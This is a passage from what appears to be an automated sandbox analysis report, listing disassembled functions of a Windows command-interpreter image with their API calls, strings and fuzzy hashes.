                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: Heap$Console_wcsnicmp$LockProcessShared$Free$AcquireBufferInfoReadReleaseScreen$AllocCharacterCursorFillHandleOutputPositionWrite_get_osfhandle
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: cd $chdir $md $mkdir $pushd $rd $rmdir
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 3637805771-3100821235
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: e6cb887516591751d838279dfb6f73a977c9c7224b6493b327e80fb3c94782b6
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 2231802c5beab9bdd248c916e857ea9e4c0ad7af45889cd9912036ac3472a9aa
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e6cb887516591751d838279dfb6f73a977c9c7224b6493b327e80fb3c94782b6
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B6E15B31B0865B8AF714AB62A80017DFAA1FB49B95BD48276DD1F537B0DFBCA405C720
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D1513F90 Relevance: 60.8, APIs: 32, Strings: 2, Instructions: 1302fileCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: Filememset$Attributes$ErrorLast$AllocCopyFindFirstVirtualwcschr
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: %s$%s
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 3623545644-3518022669
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 38a5e45e38bfe07a57e0768e9fc214b37c1ae7ae59c984c6791102e86402e929
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 7f0ca14dba81570daf1043cf92dd8dc488c77bbbf39cb6aeda10a61077ffaae8
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 38a5e45e38bfe07a57e0768e9fc214b37c1ae7ae59c984c6791102e86402e929
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7DD29F32A0864B8AFB64AB61D4902BDB7A1FB45754FD04136DA0F47AB9DFBCE444C720
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D1512C48 Relevance: 60.1, APIs: 32, Strings: 2, Instructions: 633COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: Console$memset$BufferMode$FullInfoNamePathScreen$CharacterCursorErrorFillFlushHandleInputLastOutputPositionWrite_getch_wcsicmpwcschrwcsrchr
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: %9d$%s
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 4286035211-3662383364
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 136cc2a75b229116dd3e54a838434d9f07a228baa8cef88b1cce83190b594ef6
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: a935db8b848e2476b3c7150c05001a084c48e8e298ec89019bfb058ed99e42d6
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 136cc2a75b229116dd3e54a838434d9f07a228baa8cef88b1cce83190b594ef6
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 96529022A08B8B8AFB65AB64D8502FDB7A0FB85754FD04136DA0F477A4DFBCD5448720
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D15218D4 Relevance: 42.6, APIs: 23, Strings: 1, Instructions: 644COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: wcsrchr$towlower
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: fdpnxsatz
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 3267374428-1106894203
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 08d373f91018fc1fdffc976f2f3080daf4c294e0971252b1bba390c6112b5b20
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: fa687a1635aa5ee76f238fdc566571182f11a904223ed43a8e3156b0bd6539bb
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 08d373f91018fc1fdffc976f2f3080daf4c294e0971252b1bba390c6112b5b20
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0D42D063B0968B85FB64AF2594402BEA6A1FF45B80FD48076DE0F977A4DFBCE4418310
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D1517650 Relevance: 42.5, APIs: 23, Strings: 1, Instructions: 461fileCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: File_get_osfhandle$memset$PathPointerReadSearchSizeType_wcsnicmpwcsrchr
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: DPATH
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 95024817-2010427443
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 453260b4bb9689c464f7ee8a055c2a7ad3bf1f5e95a95e4c5e119382bbbdb6fa
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: f265ff26c7c94db9bffff594ef0a0d1e80106e717b9f263da8157f02c455b50f
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 453260b4bb9689c464f7ee8a055c2a7ad3bf1f5e95a95e4c5e119382bbbdb6fa
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: DA128132A0868B86FB64AF15A45017DFAA1FB89750FC44136EA5F477B5DFBCE4408B20
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D1515240 Relevance: 33.8, APIs: 14, Strings: 5, Instructions: 503COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: [...]$ [..]$ [.]$...$:
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 0-1980097535
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: faea0ce3264b24e9714e5e9f50a61001846328088e1bd545bd05d4c9d0f2d55d
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: dfa52f92fb2a5bee75d1f463cb8c6532f678c0cea8e07e0b502f15c998eaaac8
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: faea0ce3264b24e9714e5e9f50a61001846328088e1bd545bd05d4c9d0f2d55d
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: BD329D32A08A8B86FB61EB25E4402FDB3A0EB45784FC14132DA0E476B5DFBCE545C720
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D1516EE4 Relevance: 30.1, APIs: 13, Strings: 4, Instructions: 342timeCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: Time$File$System$DateDefaultFormatInfoLocalLocaleUsermemmoverealloc
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: %02d%s%02d%s%02d$%s $%s %s $.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 1795611712-3662956551
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 74249970fbf2e4b7620cc53d3e0e908d97b29c4ace187a61a8b0bb0729ed9366
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: fd2b9476af5b3282e010b4d465cfd375f84984d578800b47ea2b8ccd8163617a
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 74249970fbf2e4b7620cc53d3e0e908d97b29c4ace187a61a8b0bb0729ed9366
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: DCE1CE22E0864B86FB50AB64A8442BDE6A1FF48784FD04133E90F576B5DFBCE584C760
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D153EE88 Relevance: 30.0, APIs: 15, Strings: 2, Instructions: 225COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        • _wcsupr.MSVCRT ref: 00007FF7D153EF33
                                                                                                                                                                                                                                                                                                                                                                                                                                        • LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF7D153E964), ref: 00007FF7D153EF98
                                                                                                                                                                                                                                                                                                                                                                                                                                        • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF7D153E964), ref: 00007FF7D153EFA9
                                                                                                                                                                                                                                                                                                                                                                                                                                        • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF7D153E964), ref: 00007FF7D153EFBF
                                                                                                                                                                                                                                                                                                                                                                                                                                        • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0 ref: 00007FF7D153EFDC
                                                                                                                                                                                                                                                                                                                                                                                                                                        • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF7D153E964), ref: 00007FF7D153EFED
                                                                                                                                                                                                                                                                                                                                                                                                                                        • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF7D153E964), ref: 00007FF7D153F003
                                                                                                                                                                                                                                                                                                                                                                                                                                        • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF7D153E964), ref: 00007FF7D153F022
                                                                                                                                                                                                                                                                                                                                                                                                                                        • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF7D153E964), ref: 00007FF7D153F083
                                                                                                                                                                                                                                                                                                                                                                                                                                        • FlushConsoleInputBuffer.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF7D153E964), ref: 00007FF7D153F092
                                                                                                                                                                                                                                                                                                                                                                                                                                        • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF7D153E964), ref: 00007FF7D153F0A5
                                                                                                                                                                                                                                                                                                                                                                                                                                        • towupper.MSVCRT(?,?,?,?,?,?), ref: 00007FF7D153F0DB
                                                                                                                                                                                                                                                                                                                                                                                                                                        • wcschr.MSVCRT(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF7D153E964), ref: 00007FF7D153F135
                                                                                                                                                                                                                                                                                                                                                                                                                                        • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF7D153E964), ref: 00007FF7D153F16C
                                                                                                                                                                                                                                                                                                                                                                                                                                        • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF7D153E964), ref: 00007FF7D153F185
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D15201B8: _get_osfhandle.MSVCRT ref: 00007FF7D15201C4
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D15201B8: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00007FF7D152E904,?,?,?,?,00000000,00007FF7D1523491,?,?,?,00007FF7D1534420), ref: 00007FF7D15201D6
                                                                                                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: Console$Mode$Handle$BufferFileFlushFreeInputLocalType_get_osfhandle_wcsuprtowupperwcschr
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: <noalias>$CMD.EXE
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 1161012917-1690691951
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: f8298d22c9df71f240bd9e1abb4a97c4f8b0018ea53697e3e253b80e8643b65e
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: daf80950beb1043322d9fa17f390b790dea28a53ca9d892c781e8040cd5e4b3a
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f8298d22c9df71f240bd9e1abb4a97c4f8b0018ea53697e3e253b80e8643b65e
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0E91AF22B0965B8AFB44BB60E8101BDBAA0AF49B54FD44137DE1F437B5DFBCA4458320
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D15132B0 Relevance: 27.2, APIs: 18, Instructions: 243COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1523578: _get_osfhandle.MSVCRT ref: 00007FF7D1523584
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1523578: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000014,00007FF7D15132E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7D152359C
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1523578: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000014,00007FF7D15132E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7D15235C3
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1523578: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF7D15132E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7D15235D9
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1523578: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00000014,00007FF7D15132E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7D15235ED
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1523578: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF7D15132E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7D1523602
                                                                                                                                                                                                                                                                                                                                                                                                                                        • _get_osfhandle.MSVCRT ref: 00007FF7D15132F3
                                                                                                                                                                                                                                                                                                                                                                                                                                        • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000014,?,?,0000002F,00007FF7D15132A4), ref: 00007FF7D1513309
                                                                                                                                                                                                                                                                                                                                                                                                                                        • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0 ref: 00007FF7D1513384
                                                                                                                                                                                                                                                                                                                                                                                                                                        • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7D15311DF
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
